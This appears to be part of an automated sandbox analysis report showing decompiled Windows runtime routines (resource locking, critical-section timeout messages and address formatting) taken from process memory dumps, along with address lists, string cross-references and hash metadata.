                                                              0x00000000
                                                              0x00000000
                                                              0x00aaeb5a
                                                              0x00a80c80
                                                              0x00a80c84
                                                              0x00aaeb98
                                                              0x00000000
                                                              0x00000000
                                                              0x00aaeba6
                                                              0x00a80cb8
                                                              0x00a80cba
                                                              0x00a80cd3
                                                              0x00a80cda
                                                              0x00a80ce4
                                                              0x00a80ce9
                                                              0x00000000
                                                              0x00a80cec
                                                              0x00a80c8c
                                                              0x00aaeb63
                                                              0x00000000
                                                              0x00000000
                                                              0x00aaeb70
                                                              0x00aaeb75
                                                              0x00aaeb7d
                                                              0x00000000
                                                              0x00000000
                                                              0x00aaeb8c
                                                              0x00000000
                                                              0x00aaeb8c
                                                              0x00a80c96
                                                              0x00000000
                                                              0x00000000
                                                              0x00a80ca2
                                                              0x00a80cac
                                                              0x00a80cb4
                                                              0x00000000
                                                              0x00000000
                                                              0x00a80b44
                                                              0x00a80b47
                                                              0x00a80b49
                                                              0x00000000
                                                              0x00000000
                                                              0x00a80b4f
                                                              0x00a80b50
                                                              0x00000000
                                                              0x00000000
                                                              0x00a80b56
                                                              0x00a80b62
                                                              0x00a80b7c
                                                              0x00a80bac
                                                              0x00a80a0f
                                                              0x00aaeaaa
                                                              0x00000000
                                                              0x00aaeac4
                                                              0x00aaeac4
                                                              0x00a80bd0
                                                              0x00a80bd0
                                                              0x00a80bd4
                                                              0x00a80bd9
                                                              0x00000000
                                                              0x00000000
                                                              0x00a80bdb
                                                              0x00a80be0
                                                              0x00aaeb0e
                                                              0x00a80a1a
                                                              0x00000000
                                                              0x00a80a1a
                                                              0x00aaeb1a
                                                              0x00aaeb1f
                                                              0x00aaeb27
                                                              0x00000000
                                                              0x00000000
                                                              0x00aaeb36
                                                              0x00000000
                                                              0x00aaeb36
                                                              0x00a80bea
                                                              0x00000000
                                                              0x00000000
                                                              0x00a80bf6
                                                              0x00a80c00
                                                              0x00a80c03
                                                              0x00a80c0b
                                                              0x00000000
                                                              0x00a80c0b
                                                              0x00aaeaaa
                                                              0x00000000
                                                              0x00a80a15
                                                              0x00a80bb6
                                                              0x00000000
                                                              0x00a80bc6
                                                              0x00a80bc6
                                                              0x00a80bcb
                                                              0x00a80c15
                                                              0x00000000
                                                              0x00000000
                                                              0x00a80c1d
                                                              0x00a80c20
                                                              0x00a80c21
                                                              0x00a80c24
                                                              0x00a80c24
                                                              0x00a80c26
                                                              0x00000000
                                                              0x00a80c26
                                                              0x00a80bcd
                                                              0x00000000
                                                              0x00a80bcd
                                                              0x00a80b89
                                                              0x00a80b89
                                                              0x00a80b90
                                                              0x00000000
                                                              0x00000000
                                                              0x00a80b96
                                                              0x00000000
                                                              0x00a80b96
                                                              0x00a80a04
                                                              0x00a80a04
                                                              0x00a80b9a
                                                              0x00a80b9a
                                                              0x00a80b9b
                                                              0x00a80b9f
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00a80ba5
                                                              0x00a80ac7
                                                              0x00a80aca
                                                              0x00aaeacf
                                                              0x00000000
                                                              0x00aaeade
                                                              0x00aaeade
                                                              0x00aaeae3
                                                              0x00000000
                                                              0x00000000
                                                              0x00aaeaf3
                                                              0x00aaeaf6
                                                              0x00aaeaf7
                                                              0x00aaeafe
                                                              0x00aaeb01
                                                              0x00000000
                                                              0x00aaeb01
                                                              0x00aaeacf
                                                              0x00a80ad0
                                                              0x00a80ad4
                                                              0x00000000
                                                              0x00000000
                                                              0x00a80ada
                                                              0x00a80ae6
                                                              0x00a80c34
                                                              0x00000000
                                                              0x00a80c47
                                                              0x00a80c49
                                                              0x00a80c4a
                                                              0x00a80c4e
                                                              0x00a80c51
                                                              0x00a80c54
                                                              0x00a80c57
                                                              0x00a80c5a
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00a80c60
                                                              0x00a80afb
                                                              0x00a80afe
                                                              0x00a80b02
                                                              0x00a80b05
                                                              0x00a80b08
                                                              0x00000000
                                                              0x00a80b08
                                                              0x00a80ae6
                                                              0x00a80b44
                                                              0x00a809f8
                                                              0x00a809f8
                                                              0x00a809f9
                                                              0x00000000
                                                              0x00000000
                                                              0x00aaeaa0
                                                              0x00000000

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.483166029.0000000000A30000.00000040.00000001.sdmp, Offset: 00A20000, based on PE: true
                                                              • Associated: 00000004.00000002.483127572.0000000000A20000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000004.00000002.483372699.0000000000B10000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000004.00000002.483377274.0000000000B20000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000004.00000002.483382029.0000000000B24000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000004.00000002.483386374.0000000000B27000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000004.00000002.483390637.0000000000B30000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000004.00000002.483434447.0000000000B90000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID: __fassign
                                                              • String ID: .$:$:
                                                              • API String ID: 3965848254-2308638275
                                                              • Opcode ID: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                                                              • Instruction ID: da0f3e67c07245a554817993a2fb5555378db85534ef3135e967e148c5833d03
                                                              • Opcode Fuzzy Hash: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                                                              • Instruction Fuzzy Hash: 7DA1B1B1D0030ADFDFA8EF64C845EBEB7B4BF05305F24856AD852A7281D7349A49CB51
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00A80554, Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 202COMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 50%
                                                              			E00A80554(signed int _a4, char _a8) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int* _t49;
				signed int _t51;
				signed int _t56;
				signed int _t58;
				signed int _t61;
				signed int _t63;
				void* _t66;
				intOrPtr _t67;
				void* _t69;
				signed int _t70;
				void* _t75;
				signed int _t81;
				signed int _t84;
				void* _t86;
				signed int _t93;
				signed int _t96;
				intOrPtr _t105;
				signed int _t107;
				void* _t110;
				signed int _t115;
				signed int* _t119;
				void* _t125;
				void* _t126;
				signed int _t128;
				signed int _t130;
				signed int _t138;
				signed int _t144;
				void* _t158;
				void* _t159;
				void* _t160;

				_t96 = _a4;
				_t115 =  *(_t96 + 0x28);
				_push(_t138);
				if(_t115 < 0) {
					_t105 =  *[fs:0x18];
					__eflags =  *((intOrPtr*)(_t96 + 0x2c)) -  *((intOrPtr*)(_t105 + 0x24));
					if( *((intOrPtr*)(_t96 + 0x2c)) !=  *((intOrPtr*)(_t105 + 0x24))) {
						goto L6;
					} else {
						__eflags = _t115 | 0xffffffff;
						asm("lock xadd [eax], edx");
						return 1;
					}
				} else {
					L6:
					_push(_t128);
					while(1) {
						L7:
						__eflags = _t115;
						if(_t115 >= 0) {
							break;
						}
						__eflags = _a8;
						if(_a8 == 0) {
							__eflags = 0;
							return 0;
						} else {
							 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
							_t49 = _t96 + 0x1c;
							_t106 = 1;
							asm("lock xadd [edx], ecx");
							_t115 =  *(_t96 + 0x28);
							__eflags = _t115;
							if(_t115 < 0) {
								L23:
								_t130 = 0;
								__eflags = 0;
								while(1) {
									_t118 =  *(_t96 + 0x30) & 0x00000001;
									asm("sbb esi, esi");
									_t144 =  !( ~( *(_t96 + 0x30) & 1)) & 0x00b201c0;
									_push(_t144);
									_push(0);
									_t51 = E00A3F8CC( *((intOrPtr*)(_t96 + 0x18)));
									__eflags = _t51 - 0x102;
									if(_t51 != 0x102) {
										break;
									}
									_t106 =  *(_t144 + 4);
									_t126 =  *_t144;
									_t86 = E00A84FC0(_t126,  *(_t144 + 4), 0xff676980, 0xffffffff);
									_push(_t126);
									_push(_t86);
									E00A93F92(0x65, 0, "RTL: Acquire Shared Sem Timeout %d(%I64u secs)\n", _t130);
									E00A93F92(0x65, 0, "RTL: Resource at %p\n", _t96);
									_t130 = _t130 + 1;
									_t160 = _t158 + 0x28;
									__eflags = _t130 - 2;
									if(__eflags > 0) {
										E00AC217A(_t106, __eflags, _t96);
									}
									_push("RTL: Re-Waiting\n");
									_push(0);
									_push(0x65);
									E00A93F92();
									_t158 = _t160 + 0xc;
								}
								__eflags = _t51;
								if(__eflags < 0) {
									_push(_t51);
									E00A83915(_t96, _t106, _t118, _t130, _t144, __eflags);
									asm("int3");
									while(1) {
										L32:
										__eflags = _a8;
										if(_a8 == 0) {
											break;
										}
										 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
										_t119 = _t96 + 0x24;
										_t107 = 1;
										asm("lock xadd [eax], ecx");
										_t56 =  *(_t96 + 0x28);
										_a4 = _t56;
										__eflags = _t56;
										if(_t56 != 0) {
											L40:
											_t128 = 0;
											__eflags = 0;
											while(1) {
												_t121 =  *(_t96 + 0x30) & 0x00000001;
												asm("sbb esi, esi");
												_t138 =  !( ~( *(_t96 + 0x30) & 1)) & 0x00b201c0;
												_push(_t138);
												_push(0);
												_t58 = E00A3F8CC( *((intOrPtr*)(_t96 + 0x20)));
												__eflags = _t58 - 0x102;
												if(_t58 != 0x102) {
													break;
												}
												_t107 =  *(_t138 + 4);
												_t125 =  *_t138;
												_t75 = E00A84FC0(_t125, _t107, 0xff676980, 0xffffffff);
												_push(_t125);
												_push(_t75);
												E00A93F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t128);
												E00A93F92(0x65, 0, "RTL: Resource at %p\n", _t96);
												_t128 = _t128 + 1;
												_t159 = _t158 + 0x28;
												__eflags = _t128 - 2;
												if(__eflags > 0) {
													E00AC217A(_t107, __eflags, _t96);
												}
												_push("RTL: Re-Waiting\n");
												_push(0);
												_push(0x65);
												E00A93F92();
												_t158 = _t159 + 0xc;
											}
											__eflags = _t58;
											if(__eflags < 0) {
												_push(_t58);
												E00A83915(_t96, _t107, _t121, _t128, _t138, __eflags);
												asm("int3");
												_t61 =  *_t107;
												 *_t107 = 0;
												__eflags = _t61;
												if(_t61 == 0) {
													L1:
													_t63 = E00A65384(_t138 + 0x24);
													if(_t63 != 0) {
														goto L52;
													} else {
														goto L2;
													}
												} else {
													_t123 =  *((intOrPtr*)(_t138 + 0x18));
													_push( &_a4);
													_push(_t61);
													_t70 = E00A3F970( *((intOrPtr*)(_t138 + 0x18)));
													__eflags = _t70;
													if(__eflags >= 0) {
														goto L1;
													} else {
														_push(_t70);
														E00A83915(_t96,  &_a4, _t123, _t128, _t138, __eflags);
														L52:
														_t122 =  *((intOrPtr*)(_t138 + 0x20));
														_push( &_a4);
														_push(1);
														_t63 = E00A3F970( *((intOrPtr*)(_t138 + 0x20)));
														__eflags = _t63;
														if(__eflags >= 0) {
															L2:
															return _t63;
														} else {
															_push(_t63);
															E00A83915(_t96,  &_a4, _t122, _t128, _t138, __eflags);
															_t109 =  *((intOrPtr*)(_t138 + 0x20));
															_push( &_a4);
															_push(1);
															_t63 = E00A3F970( *((intOrPtr*)(_t138 + 0x20)));
															__eflags = _t63;
															if(__eflags >= 0) {
																goto L2;
															} else {
																_push(_t63);
																_t66 = E00A83915(_t96, _t109, _t122, _t128, _t138, __eflags);
																asm("int3");
																while(1) {
																	_t110 = _t66;
																	__eflags = _t66 - 1;
																	if(_t66 != 1) {
																		break;
																	}
																	_t128 = _t128 | 0xffffffff;
																	_t66 = _t110;
																	asm("lock cmpxchg [ebx], edi");
																	__eflags = _t66 - _t110;
																	if(_t66 != _t110) {
																		continue;
																	} else {
																		_t67 =  *[fs:0x18];
																		 *((intOrPtr*)(_t138 + 0x2c)) =  *((intOrPtr*)(_t67 + 0x24));
																		return _t67;
																	}
																	goto L59;
																}
																E00A65329(_t110, _t138);
																_t69 = E00A653A5(_t138, 1);
																return _t69;
															}
														}
													}
												}
											} else {
												_t56 =  *(_t96 + 0x28);
												goto L3;
											}
										} else {
											_t107 =  *_t119;
											__eflags = _t107;
											if(__eflags > 0) {
												while(1) {
													_t81 = _t107;
													asm("lock cmpxchg [edi], esi");
													__eflags = _t81 - _t107;
													if(_t81 == _t107) {
														break;
													}
													_t107 = _t81;
													__eflags = _t81;
													if(_t81 > 0) {
														continue;
													}
													break;
												}
												_t56 = _a4;
												__eflags = _t107;
											}
											if(__eflags != 0) {
												while(1) {
													L3:
													__eflags = _t56;
													if(_t56 != 0) {
														goto L32;
													}
													_t107 = _t107 | 0xffffffff;
													_t56 = 0;
													asm("lock cmpxchg [edx], ecx");
													__eflags = 0;
													if(0 != 0) {
														continue;
													} else {
														 *((intOrPtr*)(_t96 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
														return 1;
													}
													goto L59;
												}
												continue;
											} else {
												goto L40;
											}
										}
										goto L59;
									}
									__eflags = 0;
									return 0;
								} else {
									_t115 =  *(_t96 + 0x28);
									continue;
								}
							} else {
								_t106 =  *_t49;
								__eflags = _t106;
								if(__eflags > 0) {
									while(1) {
										_t93 = _t106;
										asm("lock cmpxchg [edi], esi");
										__eflags = _t93 - _t106;
										if(_t93 == _t106) {
											break;
										}
										_t106 = _t93;
										__eflags = _t93;
										if(_t93 > 0) {
											continue;
										}
										break;
									}
									__eflags = _t106;
								}
								if(__eflags != 0) {
									continue;
								} else {
									goto L23;
								}
							}
						}
						goto L59;
					}
					_t84 = _t115;
					asm("lock cmpxchg [esi], ecx");
					__eflags = _t84 - _t115;
					if(_t84 != _t115) {
						_t115 = _t84;
						goto L7;
					} else {
						return 1;
					}
				}
				L59:
			}




































                                                              0x00a8055a
                                                              0x00a8055d
                                                              0x00a80563
                                                              0x00a80566
                                                              0x00a805d8
                                                              0x00a805e2
                                                              0x00a805e5
                                                              0x00000000
                                                              0x00a805e7
                                                              0x00a805e7
                                                              0x00a805ea
                                                              0x00a805f3
                                                              0x00a805f3
                                                              0x00a80568
                                                              0x00a80568
                                                              0x00a80568
                                                              0x00a80569
                                                              0x00a80569
                                                              0x00a80569
                                                              0x00a8056b
                                                              0x00000000
                                                              0x00000000
                                                              0x00aa217f
                                                              0x00aa2183
                                                              0x00aa225b
                                                              0x00aa225f
                                                              0x00aa2189
                                                              0x00aa218c
                                                              0x00aa218f
                                                              0x00aa2194
                                                              0x00aa2199
                                                              0x00aa219d
                                                              0x00aa21a0
                                                              0x00aa21a2
                                                              0x00aa21ce
                                                              0x00aa21ce
                                                              0x00aa21ce
                                                              0x00aa21d0
                                                              0x00aa21d6
                                                              0x00aa21de
                                                              0x00aa21e2
                                                              0x00aa21e8
                                                              0x00aa21e9
                                                              0x00aa21ec
                                                              0x00aa21f1
                                                              0x00aa21f6
                                                              0x00000000
                                                              0x00000000
                                                              0x00aa21f8
                                                              0x00aa21fb
                                                              0x00aa2206
                                                              0x00aa220b
                                                              0x00aa220c
                                                              0x00aa2217
                                                              0x00aa2226
                                                              0x00aa222b
                                                              0x00aa222c
                                                              0x00aa222f
                                                              0x00aa2232
                                                              0x00aa2235
                                                              0x00aa2235
                                                              0x00aa223a
                                                              0x00aa223f
                                                              0x00aa2241
                                                              0x00aa2243
                                                              0x00aa2248
                                                              0x00aa2248
                                                              0x00aa224d
                                                              0x00aa224f
                                                              0x00aa2262
                                                              0x00aa2263
                                                              0x00aa2268
                                                              0x00aa2269
                                                              0x00aa2269
                                                              0x00aa2269
                                                              0x00aa226d
                                                              0x00000000
                                                              0x00000000
                                                              0x00aa2276
                                                              0x00aa2279
                                                              0x00aa227e
                                                              0x00aa2283
                                                              0x00aa2287
                                                              0x00aa228a
                                                              0x00aa228d
                                                              0x00aa228f
                                                              0x00aa22bc
                                                              0x00aa22bc
                                                              0x00aa22bc
                                                              0x00aa22be
                                                              0x00aa22c4
                                                              0x00aa22cc
                                                              0x00aa22d0
                                                              0x00aa22d6
                                                              0x00aa22d7
                                                              0x00aa22da
                                                              0x00aa22df
                                                              0x00aa22e4
                                                              0x00000000
                                                              0x00000000
                                                              0x00aa22e6
                                                              0x00aa22e9
                                                              0x00aa22f4
                                                              0x00aa22f9
                                                              0x00aa22fa
                                                              0x00aa2305
                                                              0x00aa2314
                                                              0x00aa2319
                                                              0x00aa231a
                                                              0x00aa231d
                                                              0x00aa2320
                                                              0x00aa2323
                                                              0x00aa2323
                                                              0x00aa2328
                                                              0x00aa232d
                                                              0x00aa232f
                                                              0x00aa2331
                                                              0x00aa2336
                                                              0x00aa2336
                                                              0x00aa233b
                                                              0x00aa233d
                                                              0x00aa2350
                                                              0x00aa2351
                                                              0x00aa2356
                                                              0x00aa2359
                                                              0x00aa2359
                                                              0x00aa235b
                                                              0x00aa235d
                                                              0x00a65367
                                                              0x00a6536b
                                                              0x00a65372
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00aa2363
                                                              0x00aa2363
                                                              0x00aa2369
                                                              0x00aa236a
                                                              0x00aa236c
                                                              0x00aa2371
                                                              0x00aa2373
                                                              0x00000000
                                                              0x00aa2379
                                                              0x00aa2379
                                                              0x00aa237a
                                                              0x00aa237f
                                                              0x00aa237f
                                                              0x00aa2385
                                                              0x00aa2386
                                                              0x00aa2389
                                                              0x00aa238e
                                                              0x00aa2390
                                                              0x00a65378
                                                              0x00a6537c
                                                              0x00aa2396
                                                              0x00aa2396
                                                              0x00aa2397
                                                              0x00aa239c
                                                              0x00aa23a2
                                                              0x00aa23a3
                                                              0x00aa23a6
                                                              0x00aa23ab
                                                              0x00aa23ad
                                                              0x00000000
                                                              0x00aa23b3
                                                              0x00aa23b3
                                                              0x00aa23b4
                                                              0x00aa23b9
                                                              0x00aa23ba
                                                              0x00aa23ba
                                                              0x00aa23bc
                                                              0x00aa23bf
                                                              0x00000000
                                                              0x00000000
                                                              0x00a99153
                                                              0x00a99158
                                                              0x00a9915a
                                                              0x00a9915e
                                                              0x00a99160
                                                              0x00000000
                                                              0x00a99166
                                                              0x00a99166
                                                              0x00a99171
                                                              0x00a99176
                                                              0x00a99176
                                                              0x00000000
                                                              0x00a99160
                                                              0x00aa23c6
                                                              0x00aa23ce
                                                              0x00aa23d7
                                                              0x00aa23d7
                                                              0x00aa23ad
                                                              0x00aa2390
                                                              0x00aa2373
                                                              0x00aa233f
                                                              0x00aa233f
                                                              0x00000000
                                                              0x00aa233f
                                                              0x00aa2291
                                                              0x00aa2291
                                                              0x00aa2293
                                                              0x00aa2295
                                                              0x00aa229a
                                                              0x00aa22a1
                                                              0x00aa22a3
                                                              0x00aa22a7
                                                              0x00aa22a9
                                                              0x00000000
                                                              0x00000000
                                                              0x00aa22ab
                                                              0x00aa22ad
                                                              0x00aa22af
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00aa22af
                                                              0x00aa22b1
                                                              0x00aa22b4
                                                              0x00aa22b4
                                                              0x00aa22b6
                                                              0x00a653be
                                                              0x00a653be
                                                              0x00a653be
                                                              0x00a653c0
                                                              0x00000000
                                                              0x00000000
                                                              0x00a653cb
                                                              0x00a653ce
                                                              0x00a653d0
                                                              0x00a653d4
                                                              0x00a653d6
                                                              0x00000000
                                                              0x00a653d8
                                                              0x00a653e3
                                                              0x00a653ea
                                                              0x00a653ea
                                                              0x00000000
                                                              0x00a653d6
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00aa22b6
                                                              0x00000000
                                                              0x00aa228f
                                                              0x00aa2349
                                                              0x00aa234d
                                                              0x00aa2251
                                                              0x00aa2251
                                                              0x00000000
                                                              0x00aa2251
                                                              0x00aa21a4
                                                              0x00aa21a4
                                                              0x00aa21a6
                                                              0x00aa21a8
                                                              0x00aa21ac
                                                              0x00aa21b6
                                                              0x00aa21b8
                                                              0x00aa21bc
                                                              0x00aa21be
                                                              0x00000000
                                                              0x00000000
                                                              0x00aa21c0
                                                              0x00aa21c2
                                                              0x00aa21c4
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00aa21c4
                                                              0x00aa21c6
                                                              0x00aa21c6
                                                              0x00aa21c8
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00aa21c8
                                                              0x00aa21a2
                                                              0x00000000
                                                              0x00aa2183
                                                              0x00a8057b
                                                              0x00a8057d
                                                              0x00a80581
                                                              0x00a80583
                                                              0x00aa2178
                                                              0x00000000
                                                              0x00a80589
                                                              0x00a8058f
                                                              0x00a8058f
                                                              0x00a80583
                                                              0x00000000

                                                              APIs
                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00AA2206
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.483166029.0000000000A30000.00000040.00000001.sdmp, Offset: 00A20000, based on PE: true
                                                              • Associated: 00000004.00000002.483127572.0000000000A20000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000004.00000002.483372699.0000000000B10000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000004.00000002.483377274.0000000000B20000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000004.00000002.483382029.0000000000B24000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000004.00000002.483386374.0000000000B27000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000004.00000002.483390637.0000000000B30000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000004.00000002.483434447.0000000000B90000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                              • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                              • API String ID: 885266447-4236105082
                                                              • Opcode ID: 908223327254f09830818ec8ae3f7d4d877e2b0970df773f599098c952fda512
                                                              • Instruction ID: 7662a3023d0ac1f1c6d74e8822ec220e7cd4a0393b1a915961b4bed8a8587431
                                                              • Opcode Fuzzy Hash: 908223327254f09830818ec8ae3f7d4d877e2b0970df773f599098c952fda512
                                                              • Instruction Fuzzy Hash: 52513935B002116FEF199B18CC81FA673A9AFD9710F218229FD55DF2C6DA31EC5587A0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00A814C0, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 91COMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 64%
                                                              			E00A814C0(void* __ecx, void* __edx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16, intOrPtr* _a20) {
				signed int _v8;
				char _v10;
				char _v140;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t24;
				void* _t26;
				signed int _t29;
				signed int _t34;
				signed int _t40;
				intOrPtr _t45;
				void* _t51;
				intOrPtr* _t52;
				void* _t54;
				signed int _t57;
				void* _t58;

				_t51 = __edx;
				_t24 =  *0xb22088; // 0x745f356a
				_v8 = _t24 ^ _t57;
				_t45 = _a16;
				_t53 = _a4;
				_t52 = _a20;
				if(_a4 == 0 || _t52 == 0) {
					L10:
					_t26 = 0xc000000d;
				} else {
					if(_t45 == 0) {
						if( *_t52 == _t45) {
							goto L3;
						} else {
							goto L10;
						}
					} else {
						L3:
						_t28 =  &_v140;
						if(_a12 != 0) {
							_push("[");
							_push(0x41);
							_push( &_v140);
							_t29 = E00A77707();
							_t58 = _t58 + 0xc;
							_t28 = _t57 + _t29 * 2 - 0x88;
						}
						_t54 = E00A813CB(_t53, _t28);
						if(_a8 != 0) {
							_t34 = E00A77707(_t54,  &_v10 - _t54 >> 1, L"%%%u", _a8);
							_t58 = _t58 + 0x10;
							_t54 = _t54 + _t34 * 2;
						}
						if(_a12 != 0) {
							_t40 = E00A77707(_t54,  &_v10 - _t54 >> 1, L"]:%u", _a12 & 0x0000ffff);
							_t58 = _t58 + 0x10;
							_t54 = _t54 + _t40 * 2;
						}
						_t53 = (_t54 -  &_v140 >> 1) + 1;
						 *_t52 = _t53;
						if( *_t52 < _t53) {
							goto L10;
						} else {
							E00A42340(_t45,  &_v140, _t53 + _t53);
							_t26 = 0;
						}
					}
				}
				return E00A4E1B4(_t26, _t45, _v8 ^ _t57, _t51, _t52, _t53);
			}




















                                                              0x00a814c0
                                                              0x00a814cb
                                                              0x00a814d2
                                                              0x00a814d6
                                                              0x00a814da
                                                              0x00a814de
                                                              0x00a814e3
                                                              0x00a8157a
                                                              0x00a8157a
                                                              0x00a814f1
                                                              0x00a814f3
                                                              0x00aaea0f
                                                              0x00000000
                                                              0x00aaea15
                                                              0x00000000
                                                              0x00aaea15
                                                              0x00a814f9
                                                              0x00a814f9
                                                              0x00a814fe
                                                              0x00a81504
                                                              0x00aaea1a
                                                              0x00aaea1f
                                                              0x00aaea21
                                                              0x00aaea22
                                                              0x00aaea27
                                                              0x00aaea2a
                                                              0x00aaea2a
                                                              0x00a81515
                                                              0x00a81517
                                                              0x00a8156d
                                                              0x00a81572
                                                              0x00a81575
                                                              0x00a81575
                                                              0x00a8151e
                                                              0x00aaea50
                                                              0x00aaea55
                                                              0x00aaea58
                                                              0x00aaea58
                                                              0x00a8152e
                                                              0x00a81531
                                                              0x00a81533
                                                              0x00000000
                                                              0x00a81535
                                                              0x00a81541
                                                              0x00a81549
                                                              0x00a81549
                                                              0x00a81533
                                                              0x00a814f3
                                                              0x00a81559

                                                              APIs
                                                              • ___swprintf_l.LIBCMT ref: 00AAEA22
                                                                • Part of subcall function 00A813CB: ___swprintf_l.LIBCMT ref: 00A8146B
                                                                • Part of subcall function 00A813CB: ___swprintf_l.LIBCMT ref: 00A81490
                                                              • ___swprintf_l.LIBCMT ref: 00A8156D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.483166029.0000000000A30000.00000040.00000001.sdmp, Offset: 00A20000, based on PE: true
                                                              • Associated: 00000004.00000002.483127572.0000000000A20000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000004.00000002.483372699.0000000000B10000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000004.00000002.483377274.0000000000B20000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000004.00000002.483382029.0000000000B24000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000004.00000002.483386374.0000000000B27000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000004.00000002.483390637.0000000000B30000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000004.00000002.483434447.0000000000B90000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID: ___swprintf_l
                                                              • String ID: %%%u$]:%u$j5_t
                                                              • API String ID: 48624451-104286428
                                                              • Opcode ID: 7d3d601b5c065af6819efa8aa9111b20fa3f77d37546ed2a927dd24314fe86d1
                                                              • Instruction ID: 8eebf5763d3f5fbfe0faef7f2a56e820e9104b416245083c7acf16ea107c958d
                                                              • Opcode Fuzzy Hash: 7d3d601b5c065af6819efa8aa9111b20fa3f77d37546ed2a927dd24314fe86d1
                                                              • Instruction Fuzzy Hash: E52191B2900219ABCB24EF58CD41AEF73BCBB90700F548555FC4AD7141DB70AA5A8BE1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00A653A5, Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 185COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00AA22F4
                                                              Strings
                                                              • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 00AA22FC
                                                              • RTL: Re-Waiting, xrefs: 00AA2328
                                                              • RTL: Resource at %p, xrefs: 00AA230B
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.483166029.0000000000A30000.00000040.00000001.sdmp, Offset: 00A20000, based on PE: true
                                                              • Associated: 00000004.00000002.483127572.0000000000A20000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000004.00000002.483372699.0000000000B10000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000004.00000002.483377274.0000000000B20000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000004.00000002.483382029.0000000000B24000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000004.00000002.483386374.0000000000B27000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000004.00000002.483390637.0000000000B30000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000004.00000002.483434447.0000000000B90000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                              • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                              • API String ID: 885266447-871070163
                                                              • Opcode ID: 47360fa4984136556182ee5e1c49b921a4c9c39c788f914cf3dedb55397d740a
                                                              • Instruction ID: 1317fc116970ccd443843b3140a28835e8de914156106ca3ee5e25088ffbf05f
                                                              • Opcode Fuzzy Hash: 47360fa4984136556182ee5e1c49b921a4c9c39c788f914cf3dedb55397d740a
                                                              • Instruction Fuzzy Hash: F9513572A007026BDF15EB38CD91FA673A8EF59760F104229FD49DF281EB61EC4187A0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00A6EC56, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 145COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • RTL: Enter Critical Section Timeout (%I64u secs) %d, xrefs: 00AA248D
                                                              • RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu, xrefs: 00AA24BD
